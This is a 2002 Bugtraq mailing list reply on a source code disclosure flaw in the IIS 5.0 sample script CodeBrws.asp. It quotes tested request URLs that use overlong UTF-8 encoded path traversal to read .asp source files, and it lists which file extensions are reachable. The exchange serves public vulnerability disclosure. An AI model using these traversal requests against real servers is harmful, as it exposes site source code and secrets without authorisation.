Bugtraq mailing list archives
Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
From: H D Moore <hdm () digitaloffense net>
Date: Wed, 17 Apr 2002 07:27:56 -0500
Right, you can only access files ending in the four "allowed" extensions. These extensions are: .asp, .inc, .htm, and .html. -HD On Wednesday 17 April 2002 07:25 am, Randy Hinders wrote:
While checking various files and extensions I wanted to ensure that other files were still "protected" from this. I was not able to read the global.asa but was able to read (as expected) other asp pages.. http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/% c0%ae%c0%ae/global.asa Returned "View Active Server Page Source-- Access Denied" to the browser. http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/% c0%ae%c0%ae/iisstart.asp Returned the source code to the browser.
Current thread:
- Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Joe Testa (Apr 17)
- <Possible follow-ups>
- RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Randy Hinders (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Chris Anley (Apr 18)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)